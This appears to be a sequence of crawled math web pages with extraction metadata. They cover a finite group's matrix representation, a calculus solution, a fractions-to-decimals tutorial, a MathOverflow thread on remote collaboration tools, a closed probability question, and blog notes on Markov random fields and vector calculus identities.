Matrix representation of Dic3.D10 in GL6(𝔽61) 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 60 60 0 0 0 0 0 0 60 0 0 0 0 0 0 60 , 1 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 60 60 0 0 0 0 0 0 11 0 0 0 0 0 33 50 , 1 43 0 0 0 0 18 43 0 0 0 0 0 0 60 0 0 0 0 0 1 1 0 0 0 0 0 0 50 48 0 0 0 0 28 11 , 1 0 0 0 0 0 18 60 0 0 0 0 0 0 60 0 0 0 0 0 1 1 0 0 0 0 0 0 60 21 0 0 0 0 58 1 G:=sub<GL(6,GF(61))| [1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,60,0,0,0,0,1,60,0,0,0,0,0,0,60,0,0,0,0,0,0,60],[1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,60,0,0,0,0,0,60,0,0,0,0,0,0,11,33,0,0,0,0,0,50],[1,18,0,0,0,0,43,43,0,0,0,0,0,0,60,1,0,0,0,0,0,1,0,0,0,0,0,0,50,28,0,0,0,0,48,11],[1,18,0,0,0,0,0,60,0,0,0,0,0,0,60,1,0,0,0,0,0,1,0,0,0,0,0,0,60,58,0,0,0,0,21,1] >; Dic3.D10 in GAP, Magma, Sage, TeX {\rm Dic}_3.D_{10} % in TeX G:=Group("Dic3.D10"); // GroupNames label G:=SmallGroup(240,143); // by ID G=gap.SmallGroup(240,143); # by ID G:=PCGroup([6,-2,-2,-2,-2,-3,-5,48,116,490,6917]); // Polycyclic G:=Group<a,b,c,d|a^6=c^10=1,b^2=d^2=a^3,b*a*b^-1=c*a*c^-1=d*a*d^-1=a^-1,c*b*c^-1=d*b*d^-1=a^3*b,d*c*d^-1=c^-1>; // generators/relations ׿ × 𝔽
2020-06-01 20:20:05
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9566978216171265, "perplexity": 1395.3458954771197}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347419593.76/warc/CC-MAIN-20200601180335-20200601210335-00149.warc.gz"}
https://www.gradesaver.com/textbooks/math/calculus/calculus-early-transcendentals-8th-edition/chapter-3-section-3-8-exponential-growth-and-decay-3-8-exercises-page-244/14
## Calculus: Early Transcendentals 8th Edition The equation of the curve is: $y = 5~e^{2x}$ The slope of the curve is twice the y-coordinate: $\frac{dy}{dx} = 2y$ The solution to this equation is: $y = y(0)e^{2x}$ The curve passes through the point $(0,5)$: $y = y(0)e^{2x}$ $y(0)e^{(2)(0)} = 5$ $y(0) = 5$ The equation of the curve is: $y = 5~e^{2x}$
2019-11-19 07:23:02
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9807353615760803, "perplexity": 137.61064757287244}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496670036.23/warc/CC-MAIN-20191119070311-20191119094311-00223.warc.gz"}
https://www.ipracticemath.com/learn/decimal/converting_fractions_to_decimals
# Converting Fractions to Decimals There are instances where fractions need to be converted to decimals. A good example is when you deal with money. It is not appropriate to write $501/2 in bank cheques and ledgers. The right way is to write it as a decimal $50.50. A fraction is a ratio between two integers. Division is the most common and easiest method to convert fractions to decimal form. ### Steps for converting Fractions to Decimals •  Use the denominator as the divisor and the numerator as the dividend. •  In writing decimals, if there are no non-zero integers in the left of the decimal point, put zero (0) before the decimal point. •  If the decimal has continuous repeating digits, put an ellipsis (...) after the number or a vinculum ( __ ) on top of the repeating digit/s. ## Convert 31/100 to decimal #### Explanation: Using division 0.31 100 31.00 300 100 100 0 Therefore, 31/100 is 0.31 in decimal. ## Convert 7/4 to decimal #### Explanation: Using division; 1.75 4 7.00 4 30 28 20 20 0 Therefore, 7/4 in decimal is 1.75. ## Find the decimal form of 5/6 #### Explanation: Using division; 0.833 6 5.000 0 50 48 20 18 20 18 2 Since the digit 3 is continuous as we go along with the division, put either an ellipsis after or a vinculum ( __ ) on top the repeating digit which is 3. Therefore, the decimal form of 5/6 is 0.833333333 ## Worksheets #### Become a member today! Register (it’s Free)
2021-10-26 09:48:47
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7022947072982788, "perplexity": 1718.3661429952692}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587854.13/warc/CC-MAIN-20211026072759-20211026102759-00392.warc.gz"}
http://mathoverflow.net/feeds/question/49384
Tools for long-distance collaboration - MathOverflow most recent 30 from http://mathoverflow.net 2013-05-25T23:06:37Z http://mathoverflow.net/feeds/question/49384 http://www.creativecommons.org/licenses/by-nc/2.5/rdf http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration Tools for long-distance collaboration Willie Wong 2010-12-14T13:11:45Z 2013-02-08T12:43:06Z <h2>Background</h2> <p>In general, I am aware of four and a half methods of long-distance collaboration:</p> <ol> <li>Telephone (including voice-chat, VOIP, etc.; anything that is voice based) </li> <li>Text chat (chat room, IM, gchat, things like that)</li> <li>E-mail (or other asynchronous messaging system)</li> <li>Online whiteboards, real-time collaborative text editors, desktop-sharing (or other software, graphical system)</li> <li>(The half) Adding a webcam to any of the above and call it Video-blah.</li> </ol> <p><strong>What this question is not about</strong></p> <p>I am not asking about <a href="http://mathoverflow.net/questions/3044/tools-for-collaborative-paper-writing" rel="nofollow">tools for collaborative paper-writing</a> which has already been addressed here last year. So in particular, to limit the scope, this question is not about the part in a collaboration when all the ideas are set-out, all the heuristics checked, and all that's left is to flesh out the argument and write it up. </p> <p>I am also <em>not</em> asking for just a list of services. I am fairly confident my Google-fu is at least as good as yours. </p> <p><strong>What this question is about</strong></p> <p>I am interested in tools that help collaboration in the earlier stage when we are still brainstorming, setting the scope of the project; or the stage where we are troubleshooting to fix a flawed argument. In other words, I am interested in the scenarios where the ideal thing to do would be for a face-to-face chat while writing on a black board or a piece of paper, but when it is difficult to do so (both of you have to teach, and you are on different continents). </p> <p>In other words, I am asking about situations where real-time, instantaneous interactions are preferred (and so option 3, e-mail, should be reserved as a last resort). In this sense, voice interaction is preferred: it is a lot easier to interrupt the other party when talking then when typing, and be able to force a change of direction in the conversation. On the other hand, e-mail and a lot of the chat software has the advantage that your discussions are automatically documented and saved for future review. The main downside to a pure voice communication, however, is that (for me at least) mathematics is visual. It helps a lot when there is a black board or a piece of paper with equations on it on which I can focus my attention. So I'm especially interested in ways that I can share mathematics visually (rendered LaTeX, diagrams, things like that). </p> <h2>The Question</h2> <p>There are two questions:</p> <ul> <li>Personal testimonials: of the above solutions, which, and in what combinations, have you used and feel strongly about. I would especially appreciate it if you can say a few words about the strengths and potential weaknesses of the setup. </li> <li>Thinking outside the box: are there other solutions that I have overlooked in my list above?</li> </ul> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49386#49386 Answer by h10 for Tools for long-distance collaboration h10 2010-12-14T13:21:42Z 2010-12-14T13:21:42Z <p>Google wave. It's the next big thing.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49390#49390 Answer by Michael for Tools for long-distance collaboration Michael 2010-12-14T14:01:52Z 2010-12-15T13:15:33Z <p>Using an online whiteboard with <a href="http://en.wikipedia.org/wiki/Graphics_tablet" rel="nofollow">pen tablets</a> while talking over skype is the closest I've come to sitting around a piece of paper. I've done this with two other people simultaneously and it worked quite well. </p> <p>Unfortunately everyone needs additional hardware for this setup to be fun, but the cheapest pen tablets (from Wacom e.g.) are at about 70$and are quite easy to use and get used to. The most annoying part as I recall were the online whiteboards which could crash or behave strange, not have enough writing area or didn't allow saving the content. <strike>For a short while a good alternative was google docs drawings, but it looks like they've removed the freehand drawing tool. So I'm still looking for something adequate there.</strike> <strong>Correction:</strong> <a href="https://docs.google.com/" rel="nofollow">Google docs</a> drawings may be used as an online whiteboard and allows one to save the content. The scribble tool can be found under the shape button. </p> <p><strong>Edit:</strong> (in response to Willies comment). Stingy as I am I've only used free online whiteboards so I really can't complain. The best of these I've found were <a href="http://www.twiddla.com/" rel="nofollow">twiddla</a>, <a href="http://www.scriblink.com/" rel="nofollow">scriblink</a> and <a href="http://www.skrbl.com/" rel="nofollow">skrbl</a>. Some of them have paid plans which probably increase the user experience.</p> <p>Concerning the pen tablet I have an older version of the <a href="http://www.wacom.com/bamboo/bamboo_pen.php" rel="nofollow">Wacom Bamboo Pen</a> with which I'm happy. The fancier ones use a screen as a writing surface. I imagine that makes it feel more like writing on paper, but I'm waiting for those to merge with computer tablets. </p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49396#49396 Answer by sleepless in beantown for Tools for long-distance collaboration sleepless in beantown 2010-12-14T15:37:26Z 2010-12-14T15:37:26Z <p>What needs to exist is a system that's akin to this site's functionality that could be used on a personal or university server and allow multiple people to contribute (via password-protected entry to the web-site) together to a notebook page which contains$\LaTeX$markup and does it in a clean fashion. </p> <p>Perhaps the newer incarnation or instantiation of MO being tested on alpha.mathoverflow.net would allow for something like "private question pages" which are invitation only and could be used as an adjunct for white-board like functionality while the participants also use a telephone or skype or any other tools for instant collaboration. This technique would also allow for asynchronous updating by the collaborators if they happen to be living/working in different time zones.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49397#49397 Answer by Beth for Tools for long-distance collaboration Beth 2010-12-14T15:50:39Z 2010-12-14T15:50:39Z <p>I have been using SKYPE with the webcam pointed at my office whiteboard. I have found that the video quality is good enough to read what is on the other person's whiteboard. This isn't as nice as all parties being able to write on the same surface, but it's a great improvement over just talking and is very easy to do.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49413#49413 Answer by Peter Krautzberger for Tools for long-distance collaboration Peter Krautzberger 2010-12-14T18:00:50Z 2010-12-14T18:00:50Z <p>I'm a little late to the party, and a lot of my favorite tools have been mentioned, but since Willie Wong asked for testimonials...</p> <ul> <li><strong>Meta</strong>: don't expect it to be 'just as easy'! If you suggest to use some of these tools, make sure your collaborator understands that this requires effort (at least initially) and a different routine.</li> <li><strong>audio/video</strong>: video calls are cheap and easy to use -- perfect for all those hand-waving arguments. I mostly use <em>skype</em> (I tried tokbox for multi-user conferencing but never used it frequently). Also, as mentioned by Beth, skype is good enough to broadcast a (small) blackboard. If you have <em>real camcorder</em>, you can broadcast using <em>vlc, justin.tv or ustream</em> for higher resolution video (this comes with lag, so keep some other audio solution). Also great to hook people up to seminars btw.</li> <li><strong>Online whiteboards with tablets!</strong> The combination of online whiteboards and tablets is my favorite since it can be set up almost anywhere. I personally use <em>scriblink and dabbleboard</em> extensively; scriblink is more reliable and uses less bandwidth, but dabbleboard has fancier technology (shape recognition, upload documents as background). For more privacy, there's also <em>jarnal</em> which can connect across the net, but I could never get it to work through firewalls. There are also all-in-one tools like <em>dimdim</em> -- but they were always too general for my purpose (and had problems with flash under linux). As already mentioned by Michael, whiteboards only make sense with a <em>tablet of some sorts</em> (I was happy with a wacom bamboo (cheap), but a tabletpc is even better (I have an HP TM2 running ubuntu)) Of course, you can type text on online whiteboards (scriblink even does a little TeX), but there are better tools for plain text. </li> <li><strong>Remote Desktops</strong> Sometimes I also like to connect the desktops, i.e., allowing one side to fully access the other side's desktop. I usually do this via <em>teamviewer</em> (connects through firewalls), but <em>vnc, rdp</em> are good, too. The advantage: all your programs are there! Anything you can do on your computer, you can do together. E.g., <em>Xournal, OneNote</em> for tablet-scribbling, <em>gummi or latexian</em> for live-previewed LaTeX, pdf-viewers for collaborative document browsing etc.</li> <li><strong>LaTeX (in the cloud)</strong> If you just want to scribble some TeX, there are many wikis with$\LaTeX$support. I use <em>Tiddlywiki</em> with the mathsvg-plugin a lot these days -- a single html/javascript file, portable, fast TeX. Combined with a cloud service like <em>dropbox or box.net</em> and you can keep everything up-to-date in real time.</li> </ul> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49423#49423 Answer by domenico fiorenza for Tools for long-distance collaboration domenico fiorenza 2010-12-14T19:44:49Z 2010-12-14T19:44:49Z <p>also specific forum discussions and wikis may be useful: my last arxiv preprint has been essentially developed on <a href="http://www.math.ntnu.no/~stacey/Mathforge/nForum/" rel="nofollow">http://www.math.ntnu.no/~stacey/Mathforge/nForum/</a> before being put in paper form. It may be of interest to this topic that teh three authors of <a href="http://arxiv.org/abs/1011.4735" rel="nofollow">http://arxiv.org/abs/1011.4735</a> have never meet face-to-face and the whole developement of the paper has been via web tools.</p> <p>(sorry for making an example in which I'm personally involved)</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49424#49424 Answer by Andrew Stacey for Tools for long-distance collaboration Andrew Stacey 2010-12-14T19:49:47Z 2010-12-14T19:49:47Z <p>First, the disclaimer: although I do have long-distance collaborations, I've not yet done much real-time serious mathematics. The reasons for this are many and varied, but one relevant one is simply that my speed-of-thought is actually much slower than (I suspect) many people's so even in short-distance collaborations the "together time" is spent in <em>reporting</em> rather than <em>brain-storming</em> and that's a bit different.</p> <p>That said, "doing maths online" is a bit of a pet project of mine at the moment, so here's some thoughts.</p> <ol> <li><p>Use a wiki. <a href="http://www.instiki.org" rel="nofollow">Instiki</a>, of course, as it's the only one with decent maths support. This isn't for the <em>actual</em> dialogue, but given that the time is going to be precious, it will be useful to "set the agenda" beforehand and "take minutes" afterwards.</p></li> <li><p>For the actual collaboration, I'd recommend <a href="http://levine.sscnet.ucla.edu/general/software/tc1000/jarnal.htm" rel="nofollow">jarnal</a>. It has a client-server part so you can set up a "virtual whiteboard" for collaborating. Of course, you'd need to add the voice bit on top (telephone, per chance?). With a graphics tablet, I'd think that this would work just fine. I've used jarnal for writing in lectures and have found it very easy to use. Writing on a tablet instead of the screen quickly becomes second nature as well. (For the record, I use a Wacom Bamboo Fun tablet which I picked up in the UK for around 30 quid and I find it works just fine.) Jarnal is also cross-platform (written in java) so there's no worry about different operating systems not supporting it. Note that using something like Jarnal has the distinct advantage over webcam+whiteboard that the session is saved automatically.</p></li> <li><p>If the emphasis is less on <em>real time</em>, I would recommend a Mathematics-enabled forum (I happen to know one I could let you have at a very reasonable price, no obvious damage, no income tax, no VAT, ...). It is almost real-time, when necessary one can take the time to compose a longer answer, and the back-and-forth is recorded as well. Again, this probably reflects the fact that my "speed of thought" is slower than most, so I like to be able to read what the other person has written and ponder it a little before replying.</p></li> </ol> <p>I suspect that a good collaboration would use something akin to all three of those: the real-time for the brainstorming, the forum for the more thoughtful discussions, and the wiki for recording the bits that stand the test of time.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49430#49430 Answer by Larry Stout for Tools for long-distance collaboration Larry Stout 2010-12-14T20:32:32Z 2010-12-14T20:32:32Z <p>Maratech does exactly what you need. It has a video chat coupled with a shared whiteboard on which you can share pieces of text, drawings, pdf files, LaTeX code, etc. I've been using it for about three years for a collaboration with two Finnish mathematicians. The drawback, a big one, the company that made it was bought about two years ago and there hasn't been any word of it since.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49523#49523 Answer by Greg Graviton for Tools for long-distance collaboration Greg Graviton 2010-12-15T13:21:18Z 2010-12-15T13:21:18Z <p><em>Tools I've actually used</em></p> <p>While not serious mathematics, I have written computer programs collaboratively in real-time with</p> <ul> <li><a href="http://www.skype.com/" rel="nofollow">Skype</a>(Voice) and a cheap USB headset to have my hands free</li> <li><a href="http://etherpad.org/public-sites/" rel="nofollow">Etherpad</a> (Real-time simultaneous document editor)</li> <li>Custom shell script to feed the etherpad document right into the compiler</li> </ul> <p>Works perfectly for this particular purpose. In particular, it's much better than two persons trying to program in front of a single computer. </p> <p>I've also bought a pen tablet (a small <a href="http://www.wacom.com/bamboo/bamboo_fun.php" rel="nofollow">Wacom Bamboo Fun</a> for about 90€) that I am using for mathematical illustrations. Being able to sketch pictures is astonishingly liberating when communicating mathematics on the computer!</p> <p><em>Tools I'm planning to use</em></p> <p>Of course, I'm now trying to use the tablet for real-time collaboration on mathematics. I haven't found a good modus operandi yet, though, apart from some experiments with the <a href="http://www.cosketch.com/" rel="nofollow">CoSketch online whiteboard</a>. Usually, the main problem is that the colleague doesn't have a pen tablet himself…</p> <p>I'm also looking into the possibility of setting up an <a href="http://www.youtube.com/watch?v=5s5EvhHy7eQ" rel="nofollow">electronic whiteboard with a Wii remote</a>. But that would just be a substitute for a pen tablet.</p> <p>Ah, and for sharing a set of documents with your colleague, there is <a href="http://www.dropbox.com/" rel="nofollow">Dropbox</a>, which allows you to synchronize folders on different computers. No more chaos with different versions in different Emails! </p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/49547#49547 Answer by Kostya for Tools for long-distance collaboration Kostya 2010-12-15T17:42:55Z 2010-12-15T17:42:55Z <p>I once had experience of writing "collaborative" text in LaTeX by using <a href="http://en.wikipedia.org/wiki/Apache_Subversion" rel="nofollow">subversion</a> -- a software versioning and a revision control system for program-developers. That was really cool! Everytime you have the most up to date version. All the "collisions" are dealt with automatically e.t.c. </p> <p>The problem is -- all your collaborators has to be familiar with this software and the concepts. That's why I had such experience only once. </p> <p>But I still use it for my own projects -- I setted up repository on my usb dongle, so I do not depend on the computer I use... </p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/86719#86719 Answer by jbenet for Tools for long-distance collaboration jbenet 2012-01-26T14:07:06Z 2012-01-26T14:07:06Z <p>Sorry to revive a post so old, but I figured I'd add a small collaboration tool I just built. OP mentioned chat services and$ LaTeX $. Check out <a href="http://texchat.juanbb.com/" rel="nofollow">http://texchat.juanbb.com/</a>, a super-simple webchat that renders$LaTeX\$ math (using MathJax). I built it to address guiding others through equations online (e.g. a tutor or studygroup setting), but it's as general as a chat can be. Cheers!</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/86720#86720 Answer by B. Bischof for Tools for long-distance collaboration B. Bischof 2012-01-26T14:13:15Z 2012-01-26T14:13:15Z <p>Since this has been stirred back up after so long, I will chime in;</p> <p><a href="http://asana.com/" rel="nofollow">http://asana.com/</a></p> <p>is a great tool for organizing to-do lists with lots of tools for making the lists more than just lists.</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/86726#86726 Answer by Stefan Waldmann for Tools for long-distance collaboration Stefan Waldmann 2012-01-26T15:07:17Z 2012-01-26T15:07:17Z <p>It seems that there are still some tools missing in this long list. What I really enjoy more and more is a version control system. Personally, I prefer git over other more centralized solutions like subversion. It has several nice advantages when you're using different computers (say a desktop in your office and a laptop on the train or so) for which you do not have always a reliable internet connection. With the de-centralized approach of git, this is no big problem, you can commit changes locally and merge things back globally at a later time.</p> <p>I have by now made some nice experience with collaborators all over the globe using this...</p> http://mathoverflow.net/questions/49384/tools-for-long-distance-collaboration/121184#121184 Answer by Michael Murray for Tools for long-distance collaboration Michael Murray 2013-02-08T12:43:06Z 2013-02-08T12:43:06Z <p>Has anyone tried one of these Logitech conference cameras with Skype </p> <p><a href="http://www.logitech.com/en-us/product/Conferencecam?crid=1252" rel="nofollow">http://www.logitech.com/en-us/product/Conferencecam?crid=1252</a></p> <p>as a collaborative tool. I saw one report on-line of someone trying to use it to look at a whiteboard and claiming it didn't work because of reflections of the shiny surface.</p> <p>Thanks - Michael</p>
2013-05-25 23:06:53
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6125004887580872, "perplexity": 2287.5747043770357}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368706470784/warc/CC-MAIN-20130516121430-00092-ip-10-60-113-184.ec2.internal.warc.gz"}
https://math.stackexchange.com/questions/3217003/find-probability-of-combination-of-two-uniform-variates
# Find probability of combination of two uniform variates [closed] $$X \sim R(0, 2)$$, $$Y \sim R(0, 5)$$, X and Y are independent, I need to find $$P(|X-Y| \leq 1)$$ ## closed as off-topic by Kavi Rama Murthy, StubbornAtom, José Carlos Santos, YuiTo Cheng, Ernie060May 7 at 12:20 This question appears to be off-topic. The users who voted to close gave this specific reason: • "This question is missing context or other details: Please provide additional context, which ideally explains why the question is relevant to you and our community. Some forms of context include: background and motivation, relevant definitions, source, possible strategies, your current progress, why the question is interesting or important, etc." – Kavi Rama Murthy, StubbornAtom, José Carlos Santos, YuiTo Cheng, Ernie060 If this question can be reworded to fit the rules in the help center, please edit the question. • What does $R(a, b)$ stand for? – Yanior Weg May 7 at 11:17 • @YaniorWeg Rectangular/Uniform distribution presumably. – StubbornAtom May 7 at 11:19
2019-06-26 14:33:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 3, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.49283158779144287, "perplexity": 1925.7277433021075}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560628000353.82/warc/CC-MAIN-20190626134339-20190626160339-00177.warc.gz"}
https://justindomke.wordpress.com/2008/07/
# Marginal Beliefs of Random MRFs A pairwise Markov Random Field is a way of defining a probability distribution over some vector ${\bf x}$. One way to write one is $p({\bf x}) \propto \exp( \sum_i \phi(x_i) + \sum_{(i,j)} \psi(x_i,x_j) )$. Where the first sum is over all the variables, and the second sum is over neighboring pairs. Here, I generated some random distributions over binary valued variables. For each $i$, I set $\phi(x_i=0)=0$, and $\phi(x_i=1)=r_i$ where $r_i$ is some value randomly chosen from a standard Gaussian. For the pairwise terms, I used $\psi(x_i,x_j) = .75 \cdot I(x_i=x_j)$. (i.e. $\psi(x_i,x_j)$ is .75 when the arguments are the same, and zero otherwise.) This is an “attractive network”, where neighboring variables want to have the same value. Computing marginals $p(x_i)$ is hard in graphs that are not treelike. Here, I approximate them using a nonlinear minimization of a “free energy” similar to that used in loopy belief propagation. Here, I show the random single-variate biases $r_i$ and the resulting beliefs.  What we see is constant valued regions (encouraged by $\psi$) interrupted where the $\phi$ is very strong. Now, with more variables. Now, a “repellent” network. I repeated the procedure above, but changed the pairwise interactions to $\psi(x_i,x_j) = -.75 \cdot I(x_i\not=x_j)$. Neighboring variables want to have different values.  Notice this is the opposite of the above behavior– regions of “checkerboard” interrupted where the $\phi$ outvotes $\psi$. Now, the repellent network with more variables. # More Vector Calculus Identities I realize that “rule 2” from the previous post is actually just a special case of the vector chain rule. Rule 4. (Chain rule) If $f({\bf x}) = {\bf g}({\bf h}({\bf x}))$, then $J[{\bf f}] = J[{\bf g}]J[{\bf h}]$, or equivalently, $\frac{ \partial{\bf f} }{ \partial{\bf x}^T} = \frac{ \partial{\bf g} }{ \partial{\bf h}^T} \frac{ \partial{\bf h} }{ \partial{\bf x}^T}$. Here, I have used ${\bf h}$ to denote the argument of ${\bf g}$. (That makes it look more like the usual chain rule.) From this, you get the special case where $g$ is a scalar function. (I use the non-boldface $g$ in $g({\bf h})$ to suggest that $g$ is a scalar function that operates ‘element-wise’ on vector input.) Rule 4. (Chain rule– special case for a scalar function) If $f({\bf x}) = g({\bf h}({\bf x}))$, then $J[{\bf f}]({\bf x}) = \text{diag}[ g'({\bf h})] J[{\bf h}]$, or equivalently, $J[{\bf f}]({\bf x}) = g'({\bf h}) {\bf 1}^T \odot J[{\bf h}]$. In the last line, I use the fact that $\text{diag}({\bf x})A = {\bf x}{\bf 1}^T \odot A$. Finally, substituting $g = g' = \exp$ gives the special case below. # Vector Calculus Identities Suppose $g({\bf x}) = {\bf p}({\bf x})^T {\bf q}({\bf x})$. That is, $g$ is a scalar function of a vector ${\bf x}$, given by taking the inner product of the two vector valued functions ${\bf p}$ and ${\bf q}$. Now, we would like the gradient of $g$, i.e. $\frac{\partial g}{\partial \bf x}$. What is it? I frequently need to find such derivatives, and I have never been able to find any reference for rules to calculate them. (Though such rules surely exist somewhere!) Today, Alap and I derived a couple simple rules. The first answers the above question. Rule 1. If $g({\bf x}) = {\bf p}({\bf x})^T {\bf q}({\bf x})$, then, $\frac{\partial g}{\partial \bf x} = J[{\bf p}]^T {\bf q}({\bf x}) + J[{\bf q}]^T{\bf p}({\bf x})$. Here, $J[{\bf p}]=\frac{\partial {\bf p}}{\partial {\bf x}^T}$ is the Jacobian. i.e. $J_{i,j} = \frac{\partial p_i }{\partial x_j}$ This rule is a generalization of the calculus 101 product rule, where $g(x)=p(x) q(x)$ (everything scalar), and $g'(x) = p'(x) q(x) + q'(x) p(x)$. A different rule concerning exponentials is Rule 2. If ${\bf f}({\bf x}) = \exp({\bf q}({\bf x}))$, then $J[{\bf f}]= \frac{\partial {\bf f}}{\partial {\bf x}^T} = \exp( {\bf q}({\bf x})) {\bf 1}^T \odot J[{\bf q}]$. Here, $\odot$ is the element-wise product. The strange product with ${\bf 1}^T$ can be understood as “copying” the first vector. That is, ${\bf x} {\bf 1}^T$ is a matrix where each column consists of $\bf x$. (The number of columns must be understood from context.) Rule 3. If ${\bf f}({\bf x}) = {\bf p}({\bf x}) \odot {\bf q}({\bf x})$, then $J[{\bf f}] ={\bf p}({\bf x}){\bf 1}^T \odot J[{\bf q}] + J[{\bf p}] \odot {\bf q}({\bf x}){\bf 1}^T$ Surely there exists a large set of rules like this somewhere, but I have not been able to find them, despite needing things like this for years now. What I would really like to do is use a computer algebra system, such as Maple, Mathematica or Sage to do this, but that doesn’t seem possible at present. (It is suggested in that thread that Mathematica is up to the job, but I have tested it out found that not to be true.)
2018-11-20 00:32:23
